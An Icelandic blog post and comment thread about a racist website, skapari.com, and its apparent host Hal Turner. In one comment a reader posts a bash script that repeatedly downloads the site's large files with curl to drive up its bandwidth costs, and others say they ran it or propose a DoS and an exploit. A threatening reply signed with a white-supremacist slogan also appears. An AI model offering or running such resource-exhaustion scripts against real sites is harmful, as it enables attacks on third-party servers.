Skip to: Site menu | Main content

Þarfagreinir

Hal Turner og vinir hans

Fregnir hafa borist af íslenskri rasistasíðu, skapari.com (ég hlekkja viljandi ekki yfir á þessa síðu; geri þeim sem hana reka ekki það til geðs). ‘Skemmtilegt’ nokk þá er víst maður nokkur tengdur henni sem er mér kunnugur annars staðar frá. Sá heitir Hal Turner og heldur meðal annars úti útvarpsþætti þar sem hann fer ófögrum orðum um litað fólk og gyðinga. Ég komst að þessum tengslum sjálfur þegar ég heyrði af síðunni fyrst með því að fletta henni upp í WHOIS – þá sá ég að hún er skráð í hans nafni. Síðan sá ég að fleiri hafa dregið sömu ályktun, meðal annars visir.is.

Hal þekki ég annars í gegnum síðu sem ég hef skoðað við og við um nokkurt skeið, 4chan.org. Sú síða er alræmt athvarf nafnlausra vitleysinga. Þessir vitleysingar ákváðu nefnilega fyrir ekki svo löngu að ofsækja Hal þennan Turner, og úr því varð mikið drama. Um þetta má lesa í ítarlegu máli hér (þessi síða er því miður oft frekar hæggeng; sýnið biðlund). Niðurstaðan af þessu öllu saman var víst að maðurinn er erkifífl. Það þarf víst ekki að koma á óvart, en mér þykir engu að síður ansi skondið að sjá hann síðan birtast sem einhvers konar stuðningsmann og átrúnaðargoð nafnlausra íslenskra rasista. Já, hann virðist koma víða við, karlanginn.

“Hal Turner og vinir hans”

 1. Siggi Sveinn sagði:

  Ég tók líka eftir þessari síðu. Frétti af henni í gegnum vinnuna þegar það kom inn verkbeðni þess efnis að loka fyrir aðgang að henni.

  Við nánari athugun þarf ekkert endilega að vera að Hal sé einhver sérstakur stuðningsmaður þeirra. Að hann sé fyrst og fremst hýsingaraðilinn þeirra. Hann virðist bjóða öllum „straight, white, non-jew“ upp á hýsingarþjónustu þar sem fólk má viðra allar sínar óvinsælu skoðanir.

  Þegar ég sá að mánaðarlegt upload er tengt verðskránni, þá fór ég að velta því fyrir mér hvaða áhrif þessi skrifta gæti haft á kostnaðinn við að halda þessarri síðu úti (ef nógu margir keyra skriftuna öðru hvoru):

  #!/bin/bash
  count=100
  while [ $count -gt 0 ]
  do
  echo "count: $count ..."
  curl "http://skapari.com/linked/survival.mp3" > /dev/null
  sleep 1
  curl "http://skapari.com/linked/little%20white%20book.pdf" > /dev/null
  sleep 1
  curl "http://skapari.com/linked/natureseternalreligionorig.pdf" > /dev/null
  sleep 1
  curl "http://skapari.com/linked/whitemansbibleorig.pdf" > /dev/null
  sleep 1
  curl "http://skapari.com/linked/commie%20scum.mp3" > /dev/null
  sleep 1
  ((count--))
  done

 2. Steinríkur sagði:

  Siggi: Snilldar scripta

  Ef ég væri með ótakmarkað niðurhal færi hún beint í daglega keyrslu hjá mér.

 3. hildigunnur sagði:

  víí, keyri þetta…

 4. Skapari sagði:

  Gaman að þið skemmtið ykkur, krakkar.
  Ykkur verður launað þetta grín einhvern tímann.
  RaHoWa
  Skapari

 5. Siggi Sveinn sagði:

  Æ, æ. Er greyið skapari orðinn fúll. Búinn að taka skrárnar af vefnum sínum. En leiðinlegt. :p
  Það er svona að vera nafnlaus aumingi sem heldur að málfrelsi sé að geta sagt hvað sem er án þess að þurfa að bera ábyrgð á orðum sínum.

 6. eddi sagði:

  heh, he had i coming..
  ég keyrði scriptuna sjálfur nokkrum sinnum.. þá er bara eftir að DOS’a síðuna og finna exploit ;D

 7. ónefnd/ur sagði:

  ég hef heyrt að þetta sé hópur af „börnum“ á akureyri sem eru ekki einu sinni komin í menntaskóla og skemmta sér á bilastæðum við að slást af alvöru .Sjálf/ur er ég blönduð íslensk og „erlend/ur“ aðili og tel mig vera jafn mikill íslendingur og allir aðrir .Ég fæddist hér og þetta er líka mitt land og okkar jörð .Maður getur ekki komið í veg fyrir að fólk af ólíkri trú eða af ólíkum kynþáttum búi hér eða annars staðar það væri eins og að reyna að koma í veg fyrir að farfuglarnir komi og fari .Þetta fólk sem hélt uppi síðunni skapari.com hlítur að vera óþroskað og að geta ekki fattað það að við erum ÖLL ólík á okkar hátt . . . . samt erum við svo lýk við höfum hjarta ,heila ,líkamlegar og andlegar tilfinningar en við höfum líka með ólíkt útlit brún ,blá ,grá augu það er ekki hægt að segja að litað fólk eða gyðingar séu eitthvað verri en fólk sem er með brún eða blá augu og hvað eigum við þá að setja þau i fórnalambahópinn líka og orðið þjóðhagssinni vita þau hvað það þíðir? þau eru öruglega ekki búinn að læra hvað nafnorð eru og þau hafa engan rétt á að vera með ærumeiðingar gagnvart forsetanum , forsetafrúni og fleirum .Ég hef ekkert álit á þessu fólki því ég veit ekki hvað þau eru . . . .Eru þau mennsk ? hvað hafa þau gengið i gegnum til að verða svona ? hafa þau ekki heilbrigða skinsemi til að skilja muninn á réttu og röngu ? mitt mat er : RASISTI = EITTHVAÐ VIRKILEGA RANKT

 8. B. Ewing sagði:

  Hvernig keyrið þið Scriptu ???

Ég hef þetta að segja:

XHTML: Þú mátt nota eftirfarandi tög: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>